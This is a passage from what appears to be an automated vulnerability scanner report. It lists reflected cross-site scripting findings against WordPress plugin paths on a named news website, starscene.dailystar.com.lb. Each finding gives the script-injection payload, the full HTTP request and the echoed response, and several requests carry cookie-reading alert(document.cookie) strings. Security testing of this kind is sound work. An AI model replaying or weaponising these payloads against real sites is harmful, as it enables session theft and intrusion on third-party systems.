User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:05 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content95530\"><script>alert(1)</script>c4240e06647/plugins/world-cup-predictor/js/wcp.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.303. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e4ed"><script>alert(1)</script>c4029a74899 was submitted in the REST URL parameter 2. This input was echoed as 9e4ed\"><script>alert(1)</script>c4029a74899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9e4ed"><script>alert(1)</script>c4029a74899/world-cup-predictor/js/wcp.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:26 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins9e4ed\"><script>alert(1)</script>c4029a74899/world-cup-predictor/js/wcp.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.304. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57f83"><script>alert(1)</script>8a5da68fe58 was submitted in the REST URL parameter 3. This input was echoed as 57f83\"><script>alert(1)</script>8a5da68fe58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor57f83"><script>alert(1)</script>8a5da68fe58/js/wcp.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:25 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor57f83\"><script>alert(1)</script>8a5da68fe58/js/wcp.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.305. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c721b"><script>alert(1)</script>a6f1a1b3a49 was submitted in the REST URL parameter 4. This input was echoed as c721b\"><script>alert(1)</script>a6f1a1b3a49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor/jsc721b"><script>alert(1)</script>a6f1a1b3a49/wcp.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:18 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor/jsc721b\"><script>alert(1)</script>a6f1a1b3a49/wcp.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.306. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0d4"><script>alert(1)</script>b5fc31a812c was submitted in the REST URL parameter 5. This input was echoed as 1d0d4\"><script>alert(1)</script>b5fc31a812c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor/js/wcp.js1d0d4"><script>alert(1)</script>b5fc31a812c?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor/js/wcp.js1d0d4\"><script>alert(1)</script>b5fc31a812c?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.307. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67c5d"><script>alert(1)</script>5b6741c2669 was submitted in the REST URL parameter 1. This input was echoed as 67c5d\"><script>alert(1)</script>5b6741c2669 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content67c5d"><script>alert(1)</script>5b6741c2669/plugins/wp-email/email-css.css?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:53 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content67c5d\"><script>alert(1)</script>5b6741c2669/plugins/wp-email/email-css.css?ver=2.50'; }); return true;" >
...[SNIP]...

4.308. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a251b"><script>alert(1)</script>b73b13473f6 was submitted in the REST URL parameter 2. This input was echoed as a251b\"><script>alert(1)</script>b73b13473f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsa251b"><script>alert(1)</script>b73b13473f6/wp-email/email-css.css?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:08 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsa251b\"><script>alert(1)</script>b73b13473f6/wp-email/email-css.css?ver=2.50'; }); return true;" >
...[SNIP]...

4.309. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b248"><script>alert(1)</script>d0dbf28864a was submitted in the REST URL parameter 3. This input was echoed as 6b248\"><script>alert(1)</script>d0dbf28864a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-email6b248"><script>alert(1)</script>d0dbf28864a/email-css.css?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:13 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/wp-email6b248\"><script>alert(1)</script>d0dbf28864a/email-css.css?ver=2.50'; }); return true;" >
...[SNIP]...

4.310. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cfb3"><script>alert(1)</script>9effc6a49f was submitted in the REST URL parameter 4. This input was echoed as 7cfb3\"><script>alert(1)</script>9effc6a49f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-email/email-css.css7cfb3"><script>alert(1)</script>9effc6a49f?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:41 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/wp-email/email-css.css7cfb3\"><script>alert(1)</script>9effc6a49f?ver=2.50'; }); return true;" >
...[SNIP]...

4.311. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/wp-email/email-js.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61ca3"><script>alert(1)</script>a1e0e6d05fc was submitted in the REST URL parameter 1. This input was echoed as 61ca3\"><script>alert(1)</script>a1e0e6d05fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content61ca3"><script>alert(1)</script>a1e0e6d05fc/plugins/wp-email/email-js.js?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:38 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content61ca3\"><script>alert(1)</script>a1e0e6d05fc/plugins/wp-email/email-js.js?ver=2.50'; }); return true;" >
...[SNIP]...

4.312. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/wp-email/email-js.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58873"><script>alert(1)</script>5657a8bf0e8 was submitted in the REST URL parameter 2. This input was echoed as 58873\"><script>alert(1)</script>5657a8bf0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins58873"><script>alert(1)</script>5657a8bf0e8/wp-email/email-js.js?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:39 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins58873\"><script>alert(1)</script>5657a8bf0e8/wp-email/email-js.js?ver=2.50'; }); return true;" >
...[SNIP]...

4.313. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/wp-email/email-js.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62b9e"><script>alert(1)</script>064da61cc06 was submitted in the REST URL parameter 3. This input was echoed as 62b9e\"><script>alert(1)</script>064da61cc06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-email62b9e"><script>alert(1)</script>064da61cc06/email-js.js?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
